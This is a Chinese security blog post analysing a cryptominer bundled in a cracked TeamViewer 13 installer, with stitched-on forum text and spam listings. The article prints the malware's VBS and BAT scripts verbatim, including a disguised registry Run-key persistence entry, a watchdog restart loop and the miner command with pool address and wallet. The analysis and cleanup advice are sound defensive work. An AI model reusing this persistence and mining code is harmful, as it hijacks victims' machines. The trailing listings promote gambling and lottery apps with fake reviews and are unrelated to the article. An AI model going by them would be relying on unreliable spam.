你下载的TeamViewer13破解版可能有毒
0×0 故事背景
最近有个远程管理一下某内网服(tiao)务(ban)器(ji)的需求,映射到公网又不安全毕竟黑帽子这么多,思来想去之后还是觉得老老实实装个Teamviewer最靠谱,度娘一下发现还真的不少破解版资源可以下载,于是随意下载一个破解版准备开始操作。
0×1 安装过程
先看一下文件描述信息也没有发现什么问题,就开始下一步安装了。
安装完成了功能正常,一切OK,渐渐的电脑开始卡到爆,敏感的白帽子有一种不好的预感。
0×2 问题排查
开始仔细的检查一下进程列表在最后发现了一个奇怪的进程,居然被植入了挖矿病毒这个也太明显了吧,也不搞点进程注入无文件攻击之类的高端技术,系统盘下面也多了不少.bat与.vbs文件。
直接结束了挖矿的进程之后又自动起来了,还是看看这些同伴里面到底写了什么玩意。
0.Servicecrsssr.vbs:
im WShellSet WShell = CreateObject("WScript.Shell")WShell.Run "%windir%\winvprse.bat", 0Set WShell = Nothing
1.Winprs.bat:
@Echo OffREG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\run /v "Chrome" /f /t REG_SZ /d "%windir%\servicecrsssr.vbs"Exit
2.Winvpr.vbs:
im WShellSet WShell = CreateObject("WScript.Shell")WShell.Run "winprs.bat", 0Set WShell = Nothing
3.Winvprse.bat:
@echo offSETLOCAL EnableExtensions:starttimeout /t 160 /nobreak > NULecho offtasklist /FI "IMAGENAME eq wmipvrse.exe" 2>NUL | find /I /N "wmipvrse.exe" >NULif "%ERRORLEVEL%"=="0" goto starttasklist /FI "IMAGENAME eq wmipvrse.exe" 2>NUL | find /I /N "wmipvrse.exe" >NULif "%ERRORLEVEL%"=="1" goto processnotrunning:processnotrunningstart "" "%windir%\xdgaudio.vbs"goto startexit
4.xdgaudio.vbs
Dim WShell
Set WShell = CreateObject("WScript.Shell")WShell.Run "wmipvrse.exe --cpu-priority 2 --cpu-affinity 2 -a cryptonight -o stratum+tcp://krb.crypto-coins.club:5555 -u KjCJtxsXLAd4hUBXAUKxPSPn3L2YaAgihUUc8SQAaCfeG1QpN3kNyLyBRjRUdzmaAdYhMyoZJvUMceBuWcR3a9rnA3U4EBJ -p x", 0
Set WShell = Nothing
5.Wmipvrse.exe
矿池与钱包都这么出来了,看看到底挖了多少钱。
0×3 逆向分析
对Wmipvrse.exe这个进程里面的东西还是感到好奇,决定还是看一看,已经加壳了不过还好是UPX的标准壳可直接脱。
CPU-miner github上面的开源代码
0×4 病毒清理
事到如此根据几个vbs与bat文件的内容,运行原理还是比较清楚了,就动手清理了。
Step1:使用PCHunter删除6个病毒母体
servicecrsssr .vbs
Winprs.bat
Winvpr .vbs
Winvprse .bat
Wmipvrse.exe
xdgaudio .vbs
Step2:清除注册表
0×5 总结
1.下载软件尽量选择官方平台或者可信的第三方软件平台。
2.天下没有白吃的午餐,破解版软件里面可能含有一些让你惊喜的病毒木马后门,也许是一个大礼包呢。
3.安全无小事,日常需注意。
*本文来自FreeBuf.COM
远程控制软件TeamView,可能真封了,1306447版不能联网获取ID
今天用出现这个提示了,也就是不能联网了,怀疑是封IP
重新安装数次,勉强可以了,马上出这个提示。
另外发现下面的这个版本好像封了,看样子是连接不到服务器获取不了ID,大家的怎么样呢?
相关问答
超市电脑部用的软件有哪些?6.TeamViewer,TeamViewer是一个能在任何防火墙和NAT代理的后台用于远程控制,桌面共享和文件传输的简单且快速的解决方案。TeamViewer13为了连接到另一台计算机...
万博手机app最新版下载(官方)最新IOS//手机版APP下载_微思作者:张玉华2024-07-0401:25:13TeamViewer远程控制软件下载及安装流程解析作者:顾媚2024-07-0407:43:30如何在wps文字中删除近期文档记录作者:戴维...
E世博esball官方网站(官方)最新下载IOS//手机版APP_微思2024-07-1311:53:39推荐李闶先:这个游戏打破了传统的游戏理念,这是一个重大的创新。来自1.卓世清回复泼猴很棒的游戏,所有像素都非常好看!来自太冲回复...
怎么用一台手机控制电脑多开?9、点击属性10、点击配置按钮11、选择电源管理选项,勾选允许此设备唤醒计算机12、手机打开TeamViewer,输入电脑的ID号,点击远程控制,输入密码13、想要打...
云平台下载app(官方)最新下载IOS/安卓版/手机版APP_微思2024-07-0813:33:17推荐张翥:我一直在等待新的更新来保持游戏的新鲜感。来自1.吴升之回复赵君锡如果可以,我也想让我自己设计这样的游戏。来自黄大舆...
亿德官网app下载苹果(官方)最新下载IOS//手机版APP_微思2024-07-0616:13:49推荐李夔:这款游戏非常适合在旅途中玩,只要有空就可以轻...定的安卓模拟器是哪个作者:布鲁斯斯普林斯汀2024-07-0617:54:26Teamv...
乐玩游戏官网平台入口(官方)最新下载IOS//手机版APP_微思Teamviewer远程控制电脑的方法看这里!作者:大芭2024-07-1506:48:38批量处理...金山毒霸13下载途径有哪些作者:赫拉瑞达芙2024-07-1512:13:014...
pk10下载官方版下载(官方)最新下载IOS//手机版APP_微思2024-06-1816:13:56推荐张嘉贞:这个游戏有时候会让我有一种错觉,好像我真的置身于游戏中一样。来自1.王翰回复清远居士从头到尾都让我感到非常兴奋和期...
乐鱼官方下载地址安装(官方)最新下载IOS//手机版APP_微思2024-06-2911:13:38推荐李庚:音效和游戏玩法设计得非常好。来自1.小黑柯受良回复王澡这个游戏绝对是一个充满乐趣和刺激的冒险之旅。来自范寅孙回复...
米乐m6在线网址登录入口(官方)最新下载IOS//手机版APP_微思08:42:52WPS如何利用页眉美化教学文档作者:刘公子2024-07-0512:53:14推荐4款值得安装的电脑必备病毒防护工具作者:邵喆2024-07-0513:38:44Teamviewe...